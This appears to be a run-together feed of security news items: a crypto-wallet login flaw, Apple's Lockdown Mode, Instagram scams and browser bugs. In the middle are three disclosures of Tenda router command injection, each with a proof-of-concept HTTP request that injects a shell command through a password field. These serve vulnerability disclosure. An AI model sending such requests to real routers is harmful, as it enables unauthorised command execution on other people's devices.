Improper implementations of authentication APIs at a global crypto wallet service provider could have resulted in the loss of account control — and millions of dollars — from personal and business accounts.

A cryptocurrency wallet service provider serving more than 2 million users worldwide and managing about $3 billion worth of Bitcoin was found to contain API vulnerabilities tied to how external authentication logins were implemented. 

The bugs are fixed, but the discovery illustrates the high stakes involved in implementing APIs securely, researchers say — and the difficulties in doing so.  

According to a report shared with Dark Reading from Salt Labs, the research division of Salt Security, a series of vulnerabilities (CVEs were not assigned) could have allowed actors take over a large portion of a user's account in the system.  

This vulnerability would have given a malicious actor full access, along with the ability to perform multiple financial actions on behalf of that user, including the transfer of funds to any location of their choice.

"Once we successfully logged in to a user's accounts, we can potentially use any functionality available to the user, including funds transfer, viewing transactions history, seeing the user's personal data, which might include name, address, bank account number, and other valuable data," Salt researchers note in the report.

The first bug involved the common feature found in mobile apps that allow users to log in using an external service, like Apple ID, Google, Facebook, or Twitter. In this case, the researchers examined the "log in with Google" option — and found that the authentication token mechanism could be manipulated to accept a rogue Google ID as being that of the legitimate user.

The second bug allowed researchers to get around two-factor authentication. A PIN-reset mechanism was found to lack rate-limiting, allowing them to mount an automated attack to uncover the code sent to a user's mobile number or email.

"This endpoint does not contain any sort of rate limiting, user blocking, or temporary account disabling functionality. Basically, we can now run the entire 999,999 PIN options and get the correct PIN within less than 1 minute," according to the researchers.

Each security issue on its own provided limited abilities to the attacker, according to the report. "However, an attacker could chain these issues together to propagate a highly impactful attack, such as transferring the entire account balance to his wallet or private bank account."

Yaniv Balmas, vice president of research at Salt, explains there are two factors that made these vulnerabilities impactful and dangerous.

"First, it is very easily exploitable, and second, a successful exploitation could lead to millions of dollars — or more — being stolen from personal and business accounts," he says.

**Poor API Implementations: An Important Object Lesson**

As noted, the wallet-provider quickly fixed the API implementations in question, but there are important takeaways from the analysis, Balmas explains. After all, as the entire cryptocurrency market is relatively young, most of the services in this domain are heavily dependent on APIs as part of their core technologies.

"I have yet to see any cryptocurrency service that does not publish some sort of API to ease automated interactions with its functionalities," he says. “This reliance on APIs in turn surfaces another problem."

He explains API are designed to be dynamic and rapidly evolving interfaces for core business functionalities, which is obviously very positive from the user perspective.

"However, this same behavior opens the door for many security issues and vulnerabilities that may go unnoticed," he says. "Hence, we see with great frequency in our research efforts a relatively poor state of API security, sometimes with serious business implications."

**API Security Issues a Major Concern as Usage Grows**

As agile development grows in popularity, organizations are turning to APIs, resulting in broader attack surfaces more vulnerable to exploitation by threat actors. A recent analysis by application security firm Imperva and risk-strategy firm Marsh McLennan of breaches involving APIs revealed US companies face a combined $12 billion to $23 billion in losses in 2022.

Meanwhile, a March report from Salt Labs found API attacks increased a whopping 681% in the last year, with API attack traffic growing at more than twice the rate of nonmalicious traffic. Again, much of that could be due to implementation and configuration error: In May, for instance, Shadowserver Foundation researchers discovered that 380,000 Kubernetes API servers were open to the public Internet, representing 84% of all global Kubernetes API instances observable online.

**API Attack Surface Must Be Tracked, Monitored**

Balmas notes another issue with APIs and their nature is that once an API ecosystem gets big, it becomes very hard to have a complete handle on it. With multiple applications and internal services each publishing their own unique sets of APIs, it is very hard for the maintainers sometimes to even know which APIs are published at any given point in time.

"This is why API visibility and consolidation measures are sometimes the very first — and important — step to securing a company's APIs," he says.

Balmas recommends that cryptocurrency platforms, and any other heavy API users, should start paying more attention to the API attack surface that they expose.

"This new attack surface should be carefully tracked and monitored," he adds. "The services behind it should be more carefully reviewed on a periodic basis to make sure no new security issues have been introduced, and behavioral monitoring should be applied on the ongoing traffic to spot anomalies that might be happening in an effort to find and exploit vulnerabilities."

Buggy 'Log in With Google' API Implementation Opens Crypto Wallets to Account Takeover

Apple has announced a new feature called Lockdown Mode, designed to provide a safer environment on iOS for people at high risk of what Apple refers to as "mercenary spyware."
The post Apple Lockdown Mode helps protect users from spyware appeared first on Malwarebytes Labs.

Apple has announced a new feature of iOS 16 called Lockdown Mode. This new feature is designed to provide a safer environment on iOS for people at high risk of what Apple refers to as “mercenary spyware.” This includes people like journalists and human rights advocates, who are often targeted by oppressive regimes using malware like NSO Groups’ Pegasus spyware.

NSO is an Israeli software firm known for developing the Pegasus spyware. Pegasus has been in the spotlight frequently in recent years, and although NSO claims to limit who is allowed to have access to its spyware, each new finding shows it is used by authoritarian nations bent on monitoring and controlling critics. In one of the more infamous cases, and a classic example of how Pegasus has been used, journalist Jamal Khashoggi’s murder has been traced to the use of Pegasus by the United Arab Emirates.

**How is this possible? iPhones don’t get viruses!**

Contrary to popular belief, it is, in fact, possible for an iPhone to become infected with malware. However, this usually involves a fair bit of effort, usually the use of one or more vulnerabilities in iOS, the operating system for the iPhone. Such vulnerabilities have been known to sell for prices in the million dollar range, which puts such malware out of the reach of common criminals.

However, companies like NSO can purchase – or pay expert iOS reverse engineers to find – these vulnerabilities and incorporate them into a deployment system for their malware. They then sell access to this malware to make money.

Deploying the malware typically happens via something like a malicious text message, phone call, website, etc. For example, NSO has been known to use one-click vulnerabilities in Apple’s Messages app to infect a phone if a user taps a link. It’s also used more powerful zero-click vulnerabilities, capable of infecting a phone just by sending it a text. Because of this, Apple made changes in iOS 14 to harden Messages.

Messages is not the only possible avenue of attack, however, and it’s impossible to build a wall for the “walled garden” that doesn’t have some holes in it. Every bug is a potential avenue of attack, and all software has bugs. Thus, Apple has taken things to a new level by providing Lockdown Mode to high-risk individuals.

**What is Lockdown Mode?**

Lockdown Mode puts the iPhone into a state where it is more difficult to attack. This is done by limiting what is allowed in certain aspects of usage of the phone, to block potential avenues of attack. The improvements, per Apple’s press release, include:

*   Messages: Most message attachment types other than images are blocked. Some features, like link previews, are disabled.
*   Web browsing: Certain complex web technologies, like just-in-time (JIT) JavaScript compilation, are disabled unless the user excludes a trusted site from Lockdown Mode.
*   Apple services: Incoming invitations and service requests, including FaceTime calls, are blocked if the user has not previously sent the initiator a call or request.
*   Wired connections with a computer or accessory are blocked when iPhone is locked.
*   Configuration profiles cannot be installed, and the device cannot enrol into mobile device management (MDM), while Lockdown Mode is turned on.

Source: Apple

Although Apple refers to Lockdown Mode as “an extreme, optional protection,” the limitations don’t actually sound particularly difficult to live with. Most users probably won’t turn this on, but these restrictions sound like something that the average user could adapt to fairly easily.

**Backing it up with big bucks**

To further bolster the security of Lockdown Mode, Apple is offering an unprecedented $2 million bug bounty to anyone who can find a qualifying vulnerability that can be exploited while an iPhone is in Lockdown Mode. Vulnerability hunters everywhere will be pounding on Lockdown Mode, looking for a bug that will score them the big payout. However, this bounty will also help to ensure that the vulnerability gets disclosed to Apple rather than being sold to a company like NSO. It’s easy to do the right thing when it also earns you $2 million!

**Should I use Lockdown Mode?**

If you’re a journalist and you cover topics that may put a target on your back, absolutely! If you’re a defender of human rights and a critic of countries that trample on those rights, don’t think twice.

Average people, though, will have little chance of ever encountering “mercenary spyware.” However, the extra security definitely wouldn’t hurt, and it looks like it won’t cost you a lot in terms of lost functionality.

Apple Lockdown Mode helps protect users from spyware

Apple on Wednesday announced it plans to introduce an enhanced security setting called Lockdown Mode in iOS 16, iPadOS 16, and macOS Ventura to safeguard high-risk users against "highly targeted cyberattacks."
The "extreme, optional protection" feature, now available for preview in beta versions of its upcoming software, is designed to counter a surge in threats posed by private companies

Apple on Wednesday announced it plans to introduce an enhanced security setting called **Lockdown Mode** in iOS 16, iPadOS 16, and macOS Ventura to safeguard high-risk users against "highly targeted cyberattacks."

The "extreme, optional protection" feature, now available for preview in beta versions of its upcoming software, is designed to counter a surge in threats posed by private companies developing state-sponsored surveillanceware such as Pegasus, DevilsTongue, Predator, and Hermit.

Lockdown Mode, when enabled, "hardens device defenses and strictly limits certain functionalities, sharply reducing the attack surface that potentially could be exploited by highly targeted mercenary spyware," Apple said in a statement.

This includes blocking most message attachment types other than images and disabling link previews in Messages; rendering inoperative just-in-time (JIT) JavaScript compilation; removing support for shared albums in Photos; and preventing incoming FaceTime calls from unknown numbers.

Other restrictions cut off wired connections with a computer or accessory when an iPhone is locked and, most importantly, prohibit configuration profiles — a feature that's been abused to sideload apps bypassing the App Store — from being installed.

The tech giant also noted that it plans to incorporate additional countermeasures to Lockdown Mode over time, while simultaneously inviting feedback from the security research community to identify "qualifying findings" that will be eligible for up to $2 million in bug bounties.

It's worth noting that the feature will not be switched on by default, but can be accessed by heading to Settings > Privacy & Security > Lockdown Mode.

The announcement arrives a month after Apple debuted a new Rapid Security Response feature in iOS 16 and macOS Ventura that aims to deploy security fixes without the need for a full operating system version update.

Google and Meta offer analogous software features known as Advanced Account Protection and Facebook Protect that are meant to secure the accounts of individuals who are at an "elevated risk of targeted online attacks" from takeover attempts. But it won't be surprising if Google follows suit with a similar feature on Android.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Apple's New "Lockdown Mode" Protects iPhone, iPad, and Mac Against Spyware

Apple's new Lockdown Mode protects devices targeted by sophisticated state-sponsored mercenary spyware attacks.

Apple today announced a new feature called Lockdown Mode that automatically locks down any system functionality that could be hijacked by even the most sophisticated, state-sponsored mercenary spyware to compromise a user device.

While Apple acknowledged in its statement announcing the initiative that the number of users who might need Lockdown Mode is small, protecting those who face grave cybersecurity threats is worth the effort, the company says.

"While the vast majority of users will never be the victims of highly targeted cyberattacks, we will work tirelessly to protect the small number of users who are," Ivan Krstić, Apple's head of security engineering and architecture, said about the new Lockdown Mode function. "That includes continuing to design defenses specifically for these users, as well as supporting researchers and organizations around the world doing critically important work in exposing mercenary companies that create these digital attacks."

Apple's Lockdown Mode will be available this fall with iOS 16, iPadOS 16, and macOS Ventura. When launched, Lockdown Mode will:

*   Block message attachment types other than images, and disable some features like link previews
*   Disable just-in-time JavaScript compilation unless the user specifically excludes a trusted site from restriction
*   Block incoming invitations, service requests, and FaceTime calls unless the user previously contacted the sender
*   Block wired connections with a computer or accessory when the iPhone is locked
*   Block the installation of configuration profiles and the device's enrollment in mobile device management (MDM)

Along with Apple's announcement of the new Lockdown Mode, the company said it would provide a $10 million cybersecurity grant to researchers working on ways to prevent these targeted attacks and offer a $2 million bug bounty for finding flaws in Lockdown Mode's protections.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Apple Debuts Spyware Protection for State-Sponsored Cyberattacks

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

**\*\*\* Command Injection Vulnerability in Tenda AX1806 \*\*****_**\*Overview\***_**

*   _**\*Type\***_: Command Injection Vulnerability
    
*   _**\*Supplier\***_: Tenda ( https://tenda.com.cn )
    
*   \*\*\*Product\*\*: WiFi router AX1806
    
*   Firmware download address: \*\*\*\* https://www.tenda.com.cn/download/detail-3306.html
    
*   Firmware download address: \*\*\*\* https://down.tenda.com.cn/uploadfile/AX1806/US\_AX1806V21brv1001cn2988ZGDX01.zip
    

Tenda AX1806 uses a new generation of WIFI6 (802.11ax) technology, and combines higher number of subcarriers and 1024QAM modulation technology. Compared with wifi-5 routers, dual-band wireless internet access rate is greatly improved. WanParameterSetting has a Command Execution Vulnerability

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of Tenda AX1806 router simulation:

\### \*_**2\. Vulnerability Details\***_

Tenda AX1806 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

**_**\*3. Recurring loopholes and POC\***_**

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34597: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tenda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\* firmware download address:\***_ https://www.tenda.com.cn/download/detail-3225.html

• _**\* firmware download address:\***_ https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in wanparametersetting

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of simulation for Tenda AX1803 router:

**\*_**2\. Vulnerability Details\***_**

Tenda AX1803 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

\## _**\*3. Recurring loopholes and POC\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34596: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function setipv6status.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tengda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\*Firmware download address：\***_ https://www.tenda.com.cn/download/detail-3225.html

• \*\*\*\*Firmware download address：\*\*\*\*https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in setipv6status

##\* \* \* \\ \* description\*\*\*\*

###_**\* I. product information:\***_

Overview of the latest version of Tenda ax1803 router simulation:

\### _**\*2. Vulnerability details\***_

Tenda ax1803 is found to have a command injection vulnerability in the setipv6status function

When we set connect type = ' PPPoE ', we will get a command injection vulnerability after logging in.

\## _**\*3. Recurring vulnerabilities and POCS\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware through QEMU system or other methods (real machine)

Attack with the following POC attacks

Note to replace the password field in the cookie

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(ls > /tmp/xxx)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-34595: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Starting with iOS 16, people who are at risk of being targeted with spyware will have some much-needed help.

The surveillance-for-hire Industry has emerged in recent years as a very real threat to activists, dissidents, journalists, and human rights defenders around the world, as vendors offer increasingly invasive and effective spyware to governments. The most sophisticated of these tools, like NSO Group's notorious Pegasus spyware, target victims' smartphones using rare and sophisticated exploits to compromise Apple's iOS and Google's Android mobile operating systems. As the situation has deteriorated for victims, activists and security experts have increasingly called for more drastic measures to protect vulnerable individuals. Now Apple has an option.

Today, Apple is announcing a new feature for its upcoming iOS 16 release called Lockdown Mode. Apple emphasizes that the feature was created for a small subset of users who are at high risk of government targeting, and it doesn't expect the feature to be widely adopted. But for those who want to use it, the feature is an alternate mode of iOS that heavily restricts the tools and services that spyware actors target to take control of victims' devices.

“This is an unprecedented step for user security for high-risk users,” Ron Deibert, director of the University of Toronto's Citizen Lab said on a call with reporters ahead of the announcement. “I believe that this will throw a wrench into their modus operandi. I expect \[spyware vendors\] to try to evolve, but hopefully, this feature will prevent some of those harms from happening down the road.”

Lockdown Mode is a separate operating system mode. To turn it on, users enable the feature in the Settings menu and then are prompted to restart their device for all of the protections and digital defenses to fully take effect. The feature imposes limitations on the leakiest parts of the operating system sieve. Lockdown Mode attempts to comprehensively address threats from web browsing, for example, by blocking many speed and efficiency features that Safari (and WebKit) use to render webpages. Users can specifically mark a certain webpage as trusted so it loads normally, but by default, Lockdown Mode imposes a host of restrictions that extend anywhere WebKit is working behind the scenes. In other words, when you load web content in a third-party app or an iOS app like Mail, the same Lockdown Mode protections will apply. 

Lockdown Mode also limits all sorts of incoming invitations and requests, unless the device has previously initiated a request. That means your friend won't be able to call you on FaceTime, for example, if you've never called them. And to take it one step further, even when you initiate an interaction with another device, Lockdown Mode only honors that connection for 30 days. If you don't talk to a particular friend for weeks after that, you'll need to reestablish contact before they can reach out to you again. In Messages—a frequent target of spyware exploitation—Lockdown Mode won't show link previews and will block all attachments with the exception of a few trusted image formats.

Lockdown Mode also strengthens other protections. For example, when a device is locked, it won't receive connections from anything physically plugged into it. And, crucially, a device that isn't already registered with one of Apple's enterprise mobile device management (MDM) programs can't be added to one of these schemes once Lockdown Mode is turned on. This means that if your company gives you a phone enrolled in the corporate MDM, it will remain active if you then enable Lockdown Mode. And the manager of your MDM can't remotely turn off Lockdown Mode on your device. But if your phone is just a regular consumer device and you put it in Lockdown mode, you won't be able to activate MDM. This is important because attackers will trick victims into enabling MDM as a way of gaining the ability to install malicious apps on their devices.

Apple says the idea of Lockdown Mode feels foreign because iOS has always been developed to offer all security protections to every user. But the company saw the necessity to take drastic action as more and more spyware victims emerged worldwide. The company says it plans to continue refining Lockdown Mode and expanding it as needed. It also added a new category to its bug bounty program to reward researchers up to $2 million for finding flaws in Lockdown Mode or total bypasses. 

The company also pledged in November to donate $10 million to research and defense related to targeted spyware. On Wednesday, Apple is announcing that this money will become a grant to the Ford Foundation's Dignity and Justice Fund. At launch, advisers for the fund will come from Access Now, Citizen Lab, the Engine Room, Amnesty International, and Apple.

“The mercenary spyware industry is facilitating the spread of authoritarian practices,” Citizen Lab's Deibert emphasizes. “I applaud Apple for developing Lockdown Mode. It will be a major blow to mercenary spyware companies.”

Targeted spyware has proved a complicated threat to counter, and the industry is only growing. But a radical new defense can only help potential targets around the world who are exposed and in dire need of resources.

Apple’s Lockdown Mode Aims to Counter Spyware Threats

Fake sellers. Competitions. Crypto cons. There are plenty of grifts on the platform, but you don’t have to get sucked in.

Since Mark Zuckerberg snapped up Instagram for a mere $1 billion in April 2012, the app has grown into a social media juggernaut and one of Meta’s biggest assets. More than a billion people use Instagram every month, with influencers relying on it as a key source of their income.

Any online congregation of this size is naturally a target for hackers and scammers looking to take advantage of people and make a quick buck. As a result, Instagram is a frequent objective for scammers trying to take over your account and get you to send them money, as well as for shilling cryptocurrency scams.

“Instagram scams and account takeovers are a big problem,” says Jessica Barker, the co-CEO of cybersecurity company Cygenta, who says she has seen a recent uptick in reports of Instagram scammers. “Scams take place over all social media platforms, but Instagram’s popularity, open nature, and sense of personal connection make it an ideal platform for scammers to exploit.”

Still, it is possible to avoid the vast majority of Instagram scams with a little knowledge of what to be cautious of and some quick changes to your account settings.

How to Spot Scams on Instagram

Scammers move quickly. Whenever there’s a big event such as Russia’s war in Ukraine, the outbreak of Covid-19, or rapidly fluctuating cryptocurrency prices, the scams appear soon afterward. Online scams are constantly evolving, which means there are plenty of ways scammers may try to extort you. One startup is now even selling insurance against Instagram hacks.

“With Instagram being so popular, audiences can grow quickly, and often the number of followers can make people trust an account in no time,” says Jake Moore, global cybersecurity advisor at security firm ESET. “This is accelerated when known contacts already follow such accounts, and this trust can be a very forceful presence if required to make victims hand over details such as their credentials to a fake landing page to ‘sign in,’ for example.”

Instagram details the wide range of potential scams in a post on its website. These include loan and investment scams such as cryptocurrency scams, competitions and giveaway scams, job scams involving fake job ads, phishing scams to gain access to your account, and counterfeit products like fake iPhones and Apple Watches.

Scammers try to achieve a couple of things: They want you to send them money or get access to your Instagram account so it can be used in ongoing and future scams. These scams often work in similar ways as scammers try to trick you into either handing over personal information or money, or get you to click on links that can harvest your login details.

It’s likely that a lot of scam efforts on Instagram will be directed at you using direct messages. Scammers can send you messages or links to click on that lead to phishing websites. “A good way to recognize if you’re being manipulated is to look out for communications that are unexpected, make you feel something, and ask you to do something,” Barker says.

If an account slides into your DMs saying you’ve won a competition or that you should check out a way to make money quickly, or is offering some kind of promotional collaboration, then it's probably too good to be true. (You should delete the messages and report the scam.)

“When it comes to spotting a scam on Instagram, people should look out for messages asking you to click on a link, even if they appear to come from a friend, a trusted brand, or Instagram itself,” Barker adds. Scam messages often include typos, poor English, or want you to click on a link taking you away from the app. They often also come from recently created accounts.

Scammers have been spotted using Instagram’s logo and branding to send tech, verification, or security support messages to people via DMs. These are all fakes. Instagram says it will never send you direct messages about your account. (You can see official emails from Instagram in the app’s settings.) “Look out for posts about giveaways, gift cards, and investment schemes, as these are common tactics for criminals,” Barker says. If a brand is contacting you from an unverified account, you should be very cautious about replying.

Scams also come through Instagram Stories. “Fraudsters abuse the Instagram Stories feature, posting scams there that autodelete after 24 hours,” says Chris Boyd, lead malware intelligence analyst at cybersecurity firm Malwarebytes. “The scam is hidden behind their profile picture; you won't see it in the main collection of images,” Boyd says, adding that this move helps to keep the scam away from Instagram feeds and automatically vanish, making it harder to detect.

While competition scams and attempts to access people’s accounts aren’t new, Instagram has also seen a rise in “hostage-style” scams, where people are forced to post videos telling people to invest in bitcoin or other cryptocurrencies to get their hacked accounts returned. Multiple Instagram users, as reported by _VICE_, have been pressured into recording videos after their accounts were hacked. Other people report losing thousands to Instagram scammers. The incidents highlight why you shouldn’t trust every account you follow.

"Cryptocurrency scams are quick methods to whisk users away from the relative safety of the Instagram platform and onto trading sites where Instagram can't help,” Boyd says. “Extortion-driven cryptocurrency endorsements are a smart move on the part of the scammer. Leveraging people you know and trust in visual mediums to promote something is always going to be more convincing than a random email.”

How to Avoid Getting Scammed

There are things you can do to avoid getting hacked and the worst scams—these are a mixture of security settings and slight behavioral tweaks. Thankfully the process isn't too complicated, and small changes can make a big difference.

First, as mentioned earlier, you should avoid clicking on links that are sent to you, especially from accounts that you don’t know personally, or if someone you know sends a URL that seems out of character. “Following an account for many months still may not make it an authentic account,” Moore says.

If an account doesn’t seem right, you can look into its origins. “Research accounts to decide if they can be trusted—you can find information, such as when an account was created, by clicking **About this Account** under a profile. You can also check whether accounts are verified,” Barker says.

Second, your default setting should be one of suspicion. If your Instagram account is public, anyone can see your posts and message you. By limiting who can message you, you reduce the chances of being exposed to scams. To change whether your account is public or private, visit **Settings**, **Privacy**, and toggle your account to **Private**.

While you are in privacy settings, you should also limit who can message you. Under **Messages** there are options to send received messages to a Message Requests folder, and you can stop accounts that don’t follow you from messaging you through the **Others on Instagram** menu. For more details, see our guides on how to limit who can contact you on Instagram and the steps you can take to stop tracking and improve your Instagram privacy.

Arguably the biggest way you can protect your account from being taken over by scammers is by using a unique, strong password—stored in a password manager—and turning on multifactor authentication. Enabling multifactor authentication requires anyone trying to log in to your account to use a login code or click a notification in addition to using your password—and it's effective against account takeovers.

To turn on two-factor authentication on Instagram, tap on your profile picture in the bottom right corner of your phone, then tap on the hamburger menu. Go to **Settings**, then **Security**, then **Two-Factor Authentication**. You can turn on security protection there. If, in the worst-case scenario, your Instagram account does get hacked, here’s what you should do.

How to Avoid the Worst Instagram Scams

As a result of browser market consolidation, adversaries can focus on uncovering vulnerabilities in just two main browser engines.

Everyone uses browsers to access a wide range of networked systems, from shopping sites to enterprise management. As a result, browsers collect tons of sensitive information — from passwords to credit card data — that hackers are eager to get their hands on.

Moreover, browser vendors frequently add new features, which increases the risk of flaws in program code that hackers can exploit. And even though there seem to be a lot of different Web browsers, there are actually just two open source browser engines. Chrome, Vivaldi, Brave, and many other browsers are all built on the same engine, Chromium.

Even Microsoft killed Internet Explorer in 2021 and switched to Chromium with Edge. The only surviving alternative to Chromium is Mozilla Firefox, which uses a different engine; all the other browsers are proprietary corporate tools like Apple Safari. As a result of this consolidation, adversaries can closely focus on undercovering the vulnerabilities in the two browser engines.

**The Latest Critical Web Browser Vulnerabilities  
**Every month, we see myriad serious new Web browser vulnerabilities. In the first half of 2022, Chrome has announced three zero-day vulnerabilities. By exploiting CVE-2022-0609, hackers can corrupt data and execute code on vulnerable systems. CVE-2022-1096, which was discovered in the wild, affects the JavaScript V8 engine. CVE-2022-1364, which was also discovered in the wild, can be exploited to trigger remote code execution on a targeted system, and affects not just the nearly 3 billion users of Chrome, but also everyone using any other Chromium-based browser.

Mozilla is not immune from vulnerabilities, either. So far in 2022, we've seen CVE-2022-22753, a high-severity vulnerability that can enable an adversary to get admin rights in Windows; CVE-2022-22753, which could be abused to gain access to an arbitrary directory; and CVE-2022-1802 and CVE-2022-1529, which could be exploited to enable JavaScript code execution.

The problem is not just serious but growing: In the first quarter of 2022 alone, Chrome fixed 113 vulnerabilities, 13% more than in the same period in 2021, while Firefox fixed 88 vulnerabilities, a 12% jump from the first quarter of 2021. These increases make browsers a top target for hackers.

**How Hackers Attack Browsers  
**Hackers use multiple techniques to exploit browser vulnerabilities. Occasionally, they will discover a vulnerability that enables them to download and execute malicious code when a user simply visits a compromised site. From there, the code can download other malicious packages or steal sensitive data. Plug-ins are a common vector for these "drive-by download" attacks.

A more common tactic, however, is for hackers to send phishing emails that contain exploit kits targeting Web browsers. Indeed, Cisco's 2021 cybersecurity threat trend report found that about 90% of data breaches were due to phishing. A person clicks on a link in a phishing email, which opens a malicious page in their browser, which can exploit an unpatched vulnerability in the browser to deploy malware or steal data stored in the browser. For example, Magnitude actively targeted Chromium in October 2021.

**Strategies to Mitigate Risk From Browser Vulnerabilities  
**Organizations should combine multiple techniques to reduce their risk from browser vulnerabilities. The first is to keep all browsers updated. However, patching browsers can be problematic. Research shows that 83% of users run versions of Chrome that are vulnerable to zero-day attacks that have already been identified by Google. One reason is simply that many users do not like rebooting their browsers, which is often required as part of an update.

Another barrier to patching is that many people install browsers under their user profiles, into folders that system administrators cannot access without special tools. To overcome these issues, automate patching for third-party apps, including browsers; ensure your IT teams can force reboots remotely in a way that is convenient to end users; and manage applications installed under user profiles.

